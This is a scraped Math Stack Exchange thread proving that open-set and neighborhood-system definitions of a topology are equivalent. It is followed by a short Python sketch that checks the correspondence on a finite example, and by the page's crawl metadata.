N+a\\in\\mathcal{N}(x+a)$$\n\nSo while open sets reflect general aspects of topology correlations between space itself and topology become lucid via neighborhoods.\n\n• What is your question? – Spencer Jun 22 '14 at 21:55\n• The question was meant as: What is the proof? (See text parts in bold face.) – C-Star-W-Star Jun 22 '14 at 22:08\n• Question still unclear? – C-Star-W-Star Jun 23 '14 at 1:48\n• Let's suppose the Question is to show the equivalence of those two definitions of topological spaces. The verification can be broken down into a number of parts. You should attempt these, and ask about a specific point where you need assistance. – hardmath Jun 23 '14 at 2:35\n• No sorry, that vote was cast before your response. I've cast a reopen vote now that you have clarified it. 
– Spencer Jun 23 '14 at 2:35\n\nFor better reading I left out the details...\n\nAny family of open sets gives rise to a neighborhood system since: $$\\bullet\\left(A\\in\\mathcal{N_T}(x)\\right)\\implies\\left(U_0\\subseteq A\\quad x\\in U_0\\in\\mathcal{T}\\right)\\\\\\implies\\left(U_0\\subseteq B\\quad x\\in U_0\\in\\mathcal{T}\\right)\\implies\\left(B\\in\\mathcal{N_T}(x)\\right)\\quad A\\subseteq B\\\\ \\bullet\\left(A,B\\in\\mathcal{N_T}(x)\\right)\\implies\\left(U_A\\subseteq A,U_B\\subseteq B\\quad x\\in U_A,U_B\\in\\mathcal{T}\\right)\\\\\\implies\\left(U_A\\cap U_B\\subseteq A\\cap B\\quad x\\in U_A\\cap U_B\\in\\mathcal{T}\\right)\\implies\\left(A\\cap B\\in\\mathcal{N_T}(x)\\right)\\\\ \\bullet\\left(X\\in\\mathcal{T}:\\quad x\\in X\\subseteq X\\right)\\implies\\left(X\\in\\mathcal{N_T}(x)\\right)\\\\ \\bullet\\left(A\\in\\mathcal{N_T}(x)\\right)\\implies\\left(U_0\\subseteq A\\quad x\\in U_0\\in\\mathcal{T}\\right)\\implies\\left(x\\in U_0\\subseteq A\\right)\\\\ \\bullet\\left(A\\in\\mathcal{N_T}(x)\\right)\\implies\\left(U_0\\subseteq A\\quad x\\in U_0\\in\\mathcal{T}\\right)\\\\\\implies\\left(U_0\\subseteq A,U_0\\subseteq U_0\\quad u,x\\in U_0\\in\\mathcal{T}\\right)\\implies\\left(A\\in\\mathcal{N}(u)\\quad u\\in U_0\\in\\mathcal{N_T}(x)\\right)$$\n\nAny family of open sets gives rise to a neighborhood system since: $$\\left(A,B\\in\\mathcal{T_N}\\right)\\implies\\left(A\\in\\mathcal{N}(a),B\\in\\mathcal{N}(b)\\quad a\\in A,b\\in B\\right)\\\\\\implies\\left(A\\cap B\\in\\mathcal{N}(c)\\quad c\\in A\\cap B\\right)\\implies\\left(A\\cap B\\in\\mathcal{T_N}\\right)\\\\ \\left(A_i\\in\\mathcal{T_N}\\right)\\implies\\left(A_i\\in\\mathcal{N}(a_i)\\quad a_i\\in A_i\\right)\\\\\\implies\\left(\\bigcup_{i\\in I}A_i\\in\\mathcal{N}(c)\\quad c\\in\\bigcup_{i\\in I}A_i\\right)\\implies\\left(\\bigcup_{i\\in I}A_i\\in\\mathcal{T_N}\\right)\\\\ \\left(\\varnothing\\in\\mathcal{N}(x)\\quad x\\in\\varnothing\\right)\\implies\\left(\\varnothing\\in\\mathcal{T_N}\\right)\\\\ \\left(\\mathcal{N}(x)\\neq\\{\\}\\quad x\\in X\\right)\\implies\\left(X\\in\\mathcal{N}(x)\\quad x\\in X\\right)\\implies\\left(X\\in\\mathcal{T_N}\\right)$$\n\nNot that the interior is contained and open: $$A^\\circ\\subseteq A\\text{ and }A^\\circ\\in\\mathcal{N}(z)\\quad z\\in A^\\circ$$ (Its precise definition, statement and proof can be found in Topology: Interior.)\n\nMoreover their equivalent since: $$\\left(A\\in\\mathcal{N_T}(x)\\right)\\implies\\left(U_0\\subseteq A\\quad x\\in U_0\\in\\mathcal{T_N}\\right)\\\\\\implies\\left(U_0\\subseteq A\\quad x\\in U_0\\in\\mathcal{N}(u)\\quad u\\in U_0\\right)\\implies\\left(U_0\\subseteq A\\quad U_0\\in\\mathcal{N}(x)\\right)\\implies\\left(A\\in\\mathcal{N}(x)\\right)\\\\ \\left(A\\in\\mathcal{N}(x)\\right)\\implies\\left(A^\\circ\\subseteq A\\quad x\\in A^\\circ\\in\\mathcal{N}(z)\\quad z\\in A^\\circ\\right)\\\\\\implies\\left(A^\\circ\\subseteq A\\quad x\\in A^\\circ\\in\\mathcal{T_N}\\right)\\implies\\left(A\\in\\mathcal{N_T}(x)\\right)$$ $$\\left(A\\in\\mathcal{T_N}\\right)\\implies\\left(A\\in\\mathcal{N_T}(a)\\quad a\\in A\\right)\\\\\\implies\\left(U_a\\subseteq A\\quad a\\in U_a\\in\\mathcal{T}\\quad a\\in A\\right)\\implies\\left(A=\\bigcup_{a\\in A}U_a\\in\\mathcal{T}\\right)\\\\ \\left(A\\in\\mathcal{T}\\right)\\implies\\left(A\\subseteq A\\quad a\\in A\\in\\mathcal{T}\\quad a\\in A\\right)\\implies\\left(A\\in\\mathcal{N_T}(a)\\quad a\\in A\\right)\\implies\\left(A\\in\\mathcal{T_N}\\right)$$\n\n• @Downvoter: Could you please explain your concern! 
– C-Star-W-Star Jun 22 '14 at 20:04\n• I did not downvote yet but: 1. Proofs written as long successions of implications are unreadable by humans without great efforts. 2. Already the first implication is wrong as written (what is $U_0$?). – Did Jun 23 '14 at 5:26\n• You're right - will think about changing my style for the future. Thx for the hint!! – C-Star-W-Star Jun 23 '14 at 11:42\n• In my writing whenever a variable appears only on one side of an implication, then: no index means for all of these while an index zero means there exists this one. Is this what you meant or did you mean something else? – C-Star-W-Star Jun 23 '14 at 11:52\n• A consequence of this idiosyncratic typographical convention is that your post is unreadable. – Did Jun 23 '14 at 12:20" ]
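The correspondence in the question can also be sanity-checked on a small finite example. The sketch below models sets as Python frozensets, builds $\mathcal{N_T}$ from a topology and $\mathcal{T_N}$ from a neighborhood system, and confirms the round trip on an arbitrary three-point topology.

```python
from itertools import combinations

def powerset(xs):
    xs = list(xs)
    return [frozenset(c) for r in range(len(xs) + 1) for c in combinations(xs, r)]

def neighborhoods_from_topology(T, X):
    # A is a neighborhood of x iff some open U satisfies x in U and U is a subset of A.
    return {x: {A for A in powerset(X) if any(x in U and U <= A for U in T)}
            for x in X}

def topology_from_neighborhoods(N, X):
    # A is open iff A is a neighborhood of each of its points.
    return {A for A in powerset(X) if all(A in N[a] for a in A)}

X = frozenset({1, 2, 3})
T = {frozenset(), frozenset({1}), frozenset({1, 2}), X}   # a topology on X

N_T = neighborhoods_from_topology(T, X)
assert topology_from_neighborhoods(N_T, X) == T                                     # T -> N_T -> T
assert neighborhoods_from_topology(topology_from_neighborhoods(N_T, X), X) == N_T   # N -> T_N -> N
print("round trips verified")
```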
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.76423097,"math_prob":0.99972504,"size":2261,"snap":"2019-51-2020-05","text_gpt3_token_len":736,"char_repetition_ratio":0.20779796,"word_repetition_ratio":0.0,"special_character_ratio":0.26934984,"punctuation_ratio":0.075555556,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9999168,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-01-25T11:22:26Z\",\"WARC-Record-ID\":\"<urn:uuid:ad5cf92e-22ea-4e00-bfa8-ef0916330efa>\",\"Content-Length\":\"153198\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:61106b41-6a9a-436d-9d0c-77fa4cb3784e>\",\"WARC-Concurrent-To\":\"<urn:uuid:82b92aac-d358-4660-9999-86e4c1fc9d29>\",\"WARC-IP-Address\":\"151.101.65.69\",\"WARC-Target-URI\":\"https://math.stackexchange.com/questions/842801/topology-opens-vs-neighborhoods?noredirect=1\",\"WARC-Payload-Digest\":\"sha1:IT5UQCOOTWUTMAJPWE6FA6RZWZW7WMWV\",\"WARC-Block-Digest\":\"sha1:PDOZCD2RQ5JAWPJGSDB2X4ZCBWIIW5RU\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-05/CC-MAIN-2020-05_segments_1579251672440.80_warc_CC-MAIN-20200125101544-20200125130544-00444.warc.gz\"}"}
https://schoollearningcommons.info/question/ul-10-questions-of-1-mark-each-section-b-consist-of-6-questions-of-4-marks-each-in-which-you-hav-19836905-66/
[ "## UL 10 questions of 1 mark each. Section-B consist of 6 questions of 4 marks each in which you have to attemp Section-A Multip\n\nQuestion\n\nUL 10 questions of 1 mark each.\nSection-B consist of 6 questions of 4 marks each in which you have to attemp\nSection-A\nMultiple Choice Questions (MCQs)\nIf one zero of a quadratic polynomial x2 + 3x + k is 2, then the value of k=\na. 10\nb. – 10\nC. 5\nd. – 5\n– If the product of zeroes of the polynomials p(x)= ax3 – 6.x2 + 11x – 6 is 4, then a =\nb.\nc.\nd. – 2\n3\nIf the discriminant of the equation 6×2 – bx + 2 = 0 is 1, then the value of b is\na. 7\nb. 7\nC. +7\nd. #vi\nar? + bx + c = 0, a > 0, b=0&c> 0 has​\n\nin progress 0\n1 month 2021-08-17T14:13:33+00:00 1 Answer 0 views 0\n\n1.", null, "" ]
[ null, "https://schoollearningcommons.info/wp-content/litespeed/avatar/23494c9101089ad44ae88ce9d2f56aac.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7274662,"math_prob":0.998527,"size":782,"snap":"2021-31-2021-39","text_gpt3_token_len":309,"char_repetition_ratio":0.13239075,"word_repetition_ratio":0.22485207,"special_character_ratio":0.42455244,"punctuation_ratio":0.13432837,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9975794,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-09-20T08:01:57Z\",\"WARC-Record-ID\":\"<urn:uuid:b27912e8-c3e2-4efb-8461-0b901afc54b6>\",\"Content-Length\":\"68175\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:1c9f6075-3f2f-4e9b-9ed8-f2a0333d1233>\",\"WARC-Concurrent-To\":\"<urn:uuid:ff2cfc50-f8ee-4d95-a3ca-35aeb82a0bce>\",\"WARC-IP-Address\":\"172.96.186.144\",\"WARC-Target-URI\":\"https://schoollearningcommons.info/question/ul-10-questions-of-1-mark-each-section-b-consist-of-6-questions-of-4-marks-each-in-which-you-hav-19836905-66/\",\"WARC-Payload-Digest\":\"sha1:5QOAB6EAFQMTWJFCAM77SVQJXMYNZZWI\",\"WARC-Block-Digest\":\"sha1:ID6W4KYEUAGP4NWJ6JWQTX2QNGFARJIJ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-39/CC-MAIN-2021-39_segments_1631780057033.33_warc_CC-MAIN-20210920070754-20210920100754-00141.warc.gz\"}"}
https://educatorpages.com/site/njohnston01/pages/49282
[ "", null, "# SBUS Page\n\n### Standards Based Unit of Study Template (provided via LiveText)\n\nUnit Planning Template Teacher(s)       __Natalie Johnston____________________________________________________________________________________\n\nUnitTopic/Focus:_Algebra: Linear Equations and Functions_________________________________________________________________ Integration with other content areas (if applicable)________________________________________________________  Estimated time for implementation:____three weeks_________________________________________________________________\nProgram of Studies: UnderstandingsProgram of Studies: Skills and Concepts Related Core Content for Assessment\nMA-8-AT-U-1Students will understand that patterns, relations and functions are tools that help explain or predict real-world phenomena. MA-8-AT-U-2Students will understand that numerical patterns can be written as rules that generate the pattern. MA-8-AT-S-PRF1Students will recognize, create and extend patterns (generalize the pattern by giving the rule for the nth term and explain the generalization).MA-08-5.1.1Students will use variables to describe numerical patterns based on arithmetic sequences in real-world and mathematical problems (e.g., ƒ(Ν) = 2Ν+3).\nMA-8-AT-U-3Students will understand that algebra represents mathematical situations and structures for analysis and problem solving.MA-8-AT-S-VEO1Students will apply order of operations to evaluate and simplify algebraic expressions.\n\n## Students will given a formula, substitute appropriate elements from a real-world or mathematical situation.\n\n##### MA-8-AT-S-EI1\nStudents will use multiple representations to model and solve one- and two-variable linear equations.\n\n## MA-8-AT-S-EI2\n\nStudents will solve problems using formulas MA-8-AT-S-EI3Students will investigate linear inequalities using a variety of methods and representations.\nMA-08-5.2.1Students will evaluate and simplify algebraic expressions applying the order of operations.\n\n### DOK 2\n\nMA-08-5.2.2Students will describe, define and provide examples of variables and expressions with a missing value based on real-world and mathematical problems. MA-08-5.3.1Students will model and solve single variable, first-degree real-world and mathematical problems (e.g., 5x + 2 =x + 22, x – 4 < -60).\n\n### DOK 2\n\nMA-8-AT-U-4Students will understand that real-world situations can be represented using mathematical models to analyze quantitativerelationships.MA-8-AT-S-VEO3Students will describe, define and provide examples of variables and expressions with a missing value based on real-world and/or mathematical situations. MA-8-AT-S-EI4Students will model and solve real-world problems with one- or two-step equations or inequalities (e.g., 4x + 2 = 22, x – 4 < -60).MA-08-5.1.2Students will represent, analyze and generalize simple first and second degree relationships using tables, graphs, words and algebraic notations, and will apply the relationships to solve real-world and mathematical problems.\n\n### DOK 2\n\nMA-8-AT-U-5Students will understand that functions are used to analyze change in various contexts and model real-world phenomena.MA-8-AT-S-PR3Students will organize input-output coordinate pairs into tables, plot points in all four quadrants of a coordinate (Cartesian) system/grid and interpret resulting patterns or trends using technology as appropriate. 
MA-8-AT-S-PRF5Students will graph linear functions in a four quadrant (Cartesian) system/grid and interpret the results, using technology as appropriate. MA-8-AT-S-PRF6Students will explain how change in the input affects change in the output (e.g., in d = rt, increasing the time (t) increases the distance (d)).MA-08-5.1.5Students will explain how the change in one variable affects the change in another variable (e.g., if rate remains constant, an increase in time results in an increase in distance).\n\n### DOK 2\n\nMA-8-AT-U-6Students will understand that functions can be written in words, in a symbolic sentence or in a table.MA-8-AT-S-PRF2Students will represent, interpret and describe linear and simple quadratic functional relationships (input/output) through tables, graphs and symbolic rules.\n\n## MA-8-AT-S-PRF4\n\nStudents will interpret and explain relationships between tables, graphs, verbal rules and equations, using technology as appropriate.\n\nInterdisciplinary, Meaningful and Authentic Connections (e.g., how do the national, state, and local standards manifest within this unit and in the child’s life, what’s the “Big Idea,” why do students need to know this material):\n The students ability to analyze data and represent the data in various forms then apply these skills to real world situations. Algebraic concepts are used in the decision making process. The Algebraic thinking skills in this unit are also the foundation to future Math skills that are needed to succeed in continued education.\nContext (Unit Organizer): A narrative thatStudents will gain a foundation in Algebraic thinking that will allow them to solve real world problems and be successful in future academic efforts. This foundation will be built by first activating prior knowledge using the “What do I know? What do I want to learn” technique then developing new skills. Students will participate in hand on activities that will engage them will teaching them the skills and concepts. The real world application of Algebra will be primary in instruction to help students develop connections with material. Essential Questions (1 Essential Question supported by 3-5 Guided Questions            that guides lesson planning/focus and demonstrate):·         How do I create an algebraic expression from a real world word problem?·         How can I represent an equation (model, table, graph)?·         How do I solve addition and subtraction algebraic equations?·         How do I solve multiplication and division algebraic equations?·         How can I find the slope of a line? Culminating Activity/Assessment, A product or performance that:\n• Formative Assessments are done daily in the form of exit slips and teacher observation\n• Periodic Summative Assessment with Quizzes, mid unit exam, and Unit End Exam\n• Assessment is performed of each skill set before making the decision to proceed or add additional instruction class will only proceed if two thirds of class are proficient will the skill set\n·         Variety of instructional techniques including teacher lead, pair, cooperative groups, and individual  Resources / Technology:\n• Textbook\n• Smartboard\n• Powerpoint\n• Internet\n• Algebra Blocks\n• Spaghetti\nOutline of Daily Plans Day      Daily Objective\n\n1.       
Learning Objective: Mathematics: Applications and Concepts 2004 4-1 -Students will be able to write verbal phrases as simple Algebraic expressions and equations.\n\n-Warm-Up: Pretest\n\n-Unit Introduction-Mathematics: Applications and Concepts 2004 4-1\n\n-Guided Practice\n\n-Exit Slip:  What do I Know? What Do I Want to Know?\n\n2.       Learning Objective: Mathematics: Applications and Concepts 2004 4-2a-Students will solve equations using models.\n\n-Warm-Up: Sponge Practice Problems from 4-1\n\n- Introduction-Mathematics: Applications and Concepts 2004 4-2a\n\n-Use Algebra blocks to create models\n\n-Exit Slip:  Draw a model to solve an equation\n\n3.       Learning Objective: Mathematics: Applications and Concepts 2004 4-2-Students will solve addition and subtraction equations.\n\n-Warm-Up: Sponge Practice Problems from 4-2a\n\n-Introduction-Mathematics: Applications and Concepts 2004 4-2\n\n-Exit Slip:  Students will have a practice problem from 4-1 and 4-2a\n\n4.       Learning Objective: Mathematics: Applications and Concepts 2004 4-3-Students will solve multiplication equations.\n\n-Warm-Up: Sponge Practice Problems on 4-2\n\n- Clicker Quiz on Smartboard adding and subtracting Algebraic equations\n\n-Introduction-Mathematics: Applications and Concepts 2004 4-3\n\n-Teacher modeling and Guided Practice\n\n5.       Learning Objective: Additional guided practice to help students become proficient solving multiplication equations.\n\n-Warm-Up: Review for Mid Unit Assessment\n\n-Mid Unit Assessment (Summative Assessment)\n\n- Introduction-Mathematics: Applications and Concepts 2004 4-4\n\n6.       Learning Objective: Mathematics: Applications and Concepts 2004 4-4a-Students will explore the problem solving strategy “work backward”.\n\n-Warm-Up: Review Mid Unit Assessment\n\n- Introduction-Mathematics: Applications and Concepts 2004 4-4a\n\n-Guided Practice (Formative Assessment) and Pair Share\n\n7.       Learning Objective: Mathematics: Applications and Concepts 2004 4-4-Students will solve two step equations.\n\n-Warm-Up: Sponge Practice Problems from 4-4a\n\n- Introduction-Mathematics: Applications and Concepts 2004 4-4\n\n-Cooperative Group Activity with real world problems\n\n-Exit Slip:  What do I Know? What Do I Want to Know?\n\n*Detailed Lesson Plan Included\n\n8.       Learning Objective: Mathematics: Applications and Concepts 2004 4-4-Additional guided practice to help students become proficient solving two step equations.\n\n-Warm-Up: Practice problems from 4-4a and 4-4\n\n- Introduction-Mathematics: Applications and Concepts 2004 4-4\n\n-Guided Practice (Formative Assessment) and Pair Share\n\n-Exit Slip:  What do I Know? What Do I Want to Know?\n\n9.       Learning Objective: Mathematics: Applications and Concepts 2004 4-5- Students will graph functions on a scatter plot.\n\n-Warm-Up: Review Areas for growth from Exit Slip\n\n- Introduction-Mathematics: Applications and Concepts 2004 4-5\n\n-Guided Practice (Formative Assessment) and Pair Share with students using spaghetti to show line of best fit\n\n10.   Learning Objective: Applications and Concepts 2004 4-6- Students will graph a linear equation.\n\n-Warm-Up: Review from 4-4 and 4-5\n\n- Introduction-Mathematics: Applications and Concepts 2004 4-6\n\n11.   
Learning Objective: Applications and Concepts 2004 4-7- Students will find the slope of a line.\n\n-Warm-Up: Practice Problems form 4-6\n\n- Introduction-Mathematics: Applications and Concepts 2004 4-7\n\n-Review for End of Unit Summative Assessment\n\n12.End of Unit Summative Assessment\n\nReflections and Connections to Kentucky's Teacher Standards:\n\nNatalie Johnston\n\nEDUC 666\n\nFall 2009\n\nSBUS Reflection\n\nUpon review of my videotaped lesson I have identified areas of strength and areas for growth for myself within the Kentucky Teacher Standards. The standards give an excellent framework for my development as an educator. I have developed this reflection through personal reflection and collaboration with my host teacher.\n\nMy areas for growth are primarily with the use of technology (6.1) and in creating a positive learning environment (3.2). When I developed my lesson plan I created a power point presentation to assist in instruction. However, I failed to communicate with my host teacher that I was using Windows XP. The technology in the classroom was only compatible with power points that are in windows 1993 format. I was unable to use my power point and instead did the lesson without the use of technology. This would have been a very simple problem to fix had I know at the time I created the power point. This situation also reflects a need to develop better collaborative efforts (8.3). My other primary area for growth is in creating a positive learning environment. Classroom management is a crucial factor to being a successful teacher. During my lesson there were times that the host teacher had to assist me with controlling the class. Once I have my own class there will not be a veteran teacher there to assist me in similar situations. When we spoke after the lesson she shared advice as to how I could better facilitate classroom management such as setting the expected standard for the noise level prior to the beginning of collaborative learning activities.\n\nMy strengths include designing lessons that are relevant (2.2) and engaging to students (4.1). During my observation in the classroom prior to teaching my lesson I identified the material that was going to be covered and developed a lesson that was going to support the material. My host teacher was very pleased with my ability to create real world applications of the material. By doing so I was able to engage the students and facilitate learning. After the lesson my host teacher, Ms.Reilly, asked the students if they enjoyed the lesson and they answered with a resounding “YES”. That was one of the most gratifying moments of my very short teaching career. I know that there are going to be times when the students would prefer not to be in class (particularly Math class) but, anytime that I can illicit that type of response from a group of students I believe that we will all have grown from the experience.\n\nReflecting and evaluating upon our teaching is standard 7.2. I have found this process to be very valuable for me as a developing teacher. After the initial teaching of the lesson I took time to meet with my host teacher and reflect upon the lesson. She had excellent advice and encouragement that I was then able to use in my subsequent implementation of the lesson in the following class period. Writing this personal reflection has also been helpful in allowing me to review the teacher standards and use them as a tool for professional development." ]
[ null, "https://www.facebook.com/tr", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.89256513,"math_prob":0.5800935,"size":11728,"snap":"2020-45-2020-50","text_gpt3_token_len":2572,"char_repetition_ratio":0.18645513,"word_repetition_ratio":0.079635255,"special_character_ratio":0.23601638,"punctuation_ratio":0.0979713,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.95221996,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-10-26T04:58:36Z\",\"WARC-Record-ID\":\"<urn:uuid:32d90840-6103-4dd4-8c91-9d9d9578ce79>\",\"Content-Length\":\"61549\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:3a197b92-6f22-4a1f-9f59-38e3bb8f8ed2>\",\"WARC-Concurrent-To\":\"<urn:uuid:6fe4b757-0fbb-485d-8dba-1340609e600f>\",\"WARC-IP-Address\":\"23.96.2.14\",\"WARC-Target-URI\":\"https://educatorpages.com/site/njohnston01/pages/49282\",\"WARC-Payload-Digest\":\"sha1:E6T7QPYE3OMRPRXN5JXTV5GCZ3JVHWLM\",\"WARC-Block-Digest\":\"sha1:J2R7UHLA2IMTQKQNNDPMYQX2LHAGLMTP\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-45/CC-MAIN-2020-45_segments_1603107890273.42_warc_CC-MAIN-20201026031408-20201026061408-00650.warc.gz\"}"}
https://www.colorhexa.com/ce001c
[ "# #ce001c Color Information\n\nIn a RGB color space, hex #ce001c is composed of 80.8% red, 0% green and 11% blue. Whereas in a CMYK color space, it is composed of 0% cyan, 100% magenta, 86.4% yellow and 19.2% black. It has a hue angle of 351.8 degrees, a saturation of 100% and a lightness of 40.4%. #ce001c color hex could be obtained by blending #ff0038 with #9d0000. Closest websafe color is: #cc0033.\n\n• R 81\n• G 0\n• B 11\nRGB color chart\n• C 0\n• M 100\n• Y 86\n• K 19\nCMYK color chart\n\n#ce001c color description : Strong red.\n\n# #ce001c Color Conversion\n\nThe hexadecimal color #ce001c has RGB values of R:206, G:0, B:28 and CMYK values of C:0, M:1, Y:0.86, K:0.19. Its decimal value is 13500444.\n\nHex triplet RGB Decimal ce001c `#ce001c` 206, 0, 28 `rgb(206,0,28)` 80.8, 0, 11 `rgb(80.8%,0%,11%)` 0, 100, 86, 19 351.8°, 100, 40.4 `hsl(351.8,100%,40.4%)` 351.8°, 100, 80.8 cc0033 `#cc0033`\nCIE-LAB 43.077, 68.533, 46.595 25.665, 13.209, 2.297 0.623, 0.321, 13.209 43.077, 82.872, 34.211 43.077, 138.411, 26.315 36.344, 62.446, 21.694 11001110, 00000000, 00011100\n\n# Color Schemes with #ce001c\n\n• #ce001c\n``#ce001c` `rgb(206,0,28)``\n• #00ceb2\n``#00ceb2` `rgb(0,206,178)``\nComplementary Color\n• #ce0083\n``#ce0083` `rgb(206,0,131)``\n• #ce001c\n``#ce001c` `rgb(206,0,28)``\n• #ce4b00\n``#ce4b00` `rgb(206,75,0)``\nAnalogous Color\n• #0083ce\n``#0083ce` `rgb(0,131,206)``\n• #ce001c\n``#ce001c` `rgb(206,0,28)``\n• #00ce4b\n``#00ce4b` `rgb(0,206,75)``\nSplit Complementary Color\n• #001cce\n``#001cce` `rgb(0,28,206)``\n• #ce001c\n``#ce001c` `rgb(206,0,28)``\n• #1cce00\n``#1cce00` `rgb(28,206,0)``\n• #b200ce\n``#b200ce` `rgb(178,0,206)``\n• #ce001c\n``#ce001c` `rgb(206,0,28)``\n• #1cce00\n``#1cce00` `rgb(28,206,0)``\n• #00ceb2\n``#00ceb2` `rgb(0,206,178)``\n• #820012\n``#820012` `rgb(130,0,18)``\n• #9b0015\n``#9b0015` `rgb(155,0,21)``\n• #b50019\n``#b50019` `rgb(181,0,25)``\n• #ce001c\n``#ce001c` `rgb(206,0,28)``\n• #e8001f\n``#e8001f` `rgb(232,0,31)``\n• #ff0224\n``#ff0224` `rgb(255,2,36)``\n• #ff1c3a\n``#ff1c3a` `rgb(255,28,58)``\nMonochromatic Color\n\n# Alternatives to #ce001c\n\nBelow, you can see some colors close to #ce001c. Having a set of related colors can be useful if you need an inspirational alternative to your original color choice.\n\n• #ce0050\n``#ce0050` `rgb(206,0,80)``\n• #ce003e\n``#ce003e` `rgb(206,0,62)``\n• #ce002d\n``#ce002d` `rgb(206,0,45)``\n• #ce001c\n``#ce001c` `rgb(206,0,28)``\n• #ce000b\n``#ce000b` `rgb(206,0,11)``\n• #ce0600\n``#ce0600` `rgb(206,6,0)``\n• #ce1800\n``#ce1800` `rgb(206,24,0)``\nSimilar Colors\n\n# #ce001c Preview\n\nThis text has a font color of #ce001c.\n\n``<span style=\"color:#ce001c;\">Text here</span>``\n#ce001c background color\n\nThis paragraph has a background color of #ce001c.\n\n``<p style=\"background-color:#ce001c;\">Content here</p>``\n#ce001c border color\n\nThis element has a border color of #ce001c.\n\n``<div style=\"border:1px solid #ce001c;\">Content here</div>``\nCSS codes\n``.text {color:#ce001c;}``\n``.background {background-color:#ce001c;}``\n``.border {border:1px solid #ce001c;}``\n\n# Shades and Tints of #ce001c\n\nA shade is achieved by adding black to any pure hue, while a tint is created by mixing white to any pure color. 
In this example, #0a0001 is the darkest color, while #fff5f7 is the lightest one.\n\n• #0a0001\n``#0a0001` `rgb(10,0,1)``\n• #1d0004\n``#1d0004` `rgb(29,0,4)``\n• #310007\n``#310007` `rgb(49,0,7)``\n• #450009\n``#450009` `rgb(69,0,9)``\n• #58000c\n``#58000c` `rgb(88,0,12)``\n• #6c000f\n``#6c000f` `rgb(108,0,15)``\n• #800011\n``#800011` `rgb(128,0,17)``\n• #930014\n``#930014` `rgb(147,0,20)``\n• #a70017\n``#a70017` `rgb(167,0,23)``\n• #ba0019\n``#ba0019` `rgb(186,0,25)``\n• #ce001c\n``#ce001c` `rgb(206,0,28)``\n• #e2001f\n``#e2001f` `rgb(226,0,31)``\n• #f50021\n``#f50021` `rgb(245,0,33)``\n• #ff0a2b\n``#ff0a2b` `rgb(255,10,43)``\n• #ff1d3c\n``#ff1d3c` `rgb(255,29,60)``\n• #ff314d\n``#ff314d` `rgb(255,49,77)``\n• #ff455e\n``#ff455e` `rgb(255,69,94)``\n• #ff586f\n``#ff586f` `rgb(255,88,111)``\n• #ff6c80\n``#ff6c80` `rgb(255,108,128)``\n• #ff8091\n``#ff8091` `rgb(255,128,145)``\n• #ff93a2\n``#ff93a2` `rgb(255,147,162)``\n• #ffa7b3\n``#ffa7b3` `rgb(255,167,179)``\n• #ffbac4\n``#ffbac4` `rgb(255,186,196)``\n• #ffced5\n``#ffced5` `rgb(255,206,213)``\n• #ffe2e6\n``#ffe2e6` `rgb(255,226,230)``\n• #fff5f7\n``#fff5f7` `rgb(255,245,247)``\nTint Color Variation\n\n# Tones of #ce001c\n\nA tone is produced by adding gray to any pure hue. In this case, #6f5f61 is the less saturated color, while #ce001c is the most saturated one.\n\n• #6f5f61\n``#6f5f61` `rgb(111,95,97)``\n• #77575b\n``#77575b` `rgb(119,87,91)``\n• #7f4f56\n``#7f4f56` `rgb(127,79,86)``\n• #874750\n``#874750` `rgb(135,71,80)``\n• #8f3f4a\n``#8f3f4a` `rgb(143,63,74)``\n• #973744\n``#973744` `rgb(151,55,68)``\n• #9e303f\n``#9e303f` `rgb(158,48,63)``\n• #a62839\n``#a62839` `rgb(166,40,57)``\n• #ae2033\n``#ae2033` `rgb(174,32,51)``\n• #b6182d\n``#b6182d` `rgb(182,24,45)``\n• #be1028\n``#be1028` `rgb(190,16,40)``\n• #c60822\n``#c60822` `rgb(198,8,34)``\n• #ce001c\n``#ce001c` `rgb(206,0,28)``\nTone Color Variation\n\n# Color Blindness Simulator\n\nBelow, you can see how #ce001c is perceived by people affected by a color vision deficiency. This can be useful if you need to ensure your color combinations are accessible to color-blind users.\n\nMonochromacy\n• Achromatopsia 0.005% of the population\n• Atypical Achromatopsia 0.001% of the population\nDichromacy\n• Protanopia 1% of men\n• Deuteranopia 1% of men\n• Tritanopia 0.001% of the population\nTrichromacy\n• Protanomaly 1% of men, 0.01% of women\n• Deuteranomaly 6% of men, 0.4% of women\n• Tritanomaly 0.01% of the population" ]
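The hex, RGB, and HSL figures listed above are straightforward to reproduce programmatically. The Python sketch below is illustrative only and is not code from this site; the helper names are made up, and the blend() helper simply mirrors the idea that tints mix a color toward white while shades mix it toward black.

```python
import colorsys

def hex_to_rgb(hex_str):
    """'#ce001c' -> (206, 0, 28)"""
    hex_str = hex_str.lstrip('#')
    return tuple(int(hex_str[i:i + 2], 16) for i in (0, 2, 4))

def hex_to_hsl(hex_str):
    """Return (hue in degrees, saturation %, lightness %)."""
    r, g, b = (c / 255.0 for c in hex_to_rgb(hex_str))
    h, l, s = colorsys.rgb_to_hls(r, g, b)   # note: colorsys returns H, L, S
    return round(h * 360, 1), round(s * 100, 1), round(l * 100, 1)

def blend(hex_a, hex_b, t):
    """Linear mix of two colors; t=0 gives hex_a, t=1 gives hex_b."""
    a, b = hex_to_rgb(hex_a), hex_to_rgb(hex_b)
    return '#%02x%02x%02x' % tuple(round(x + (y - x) * t) for x, y in zip(a, b))

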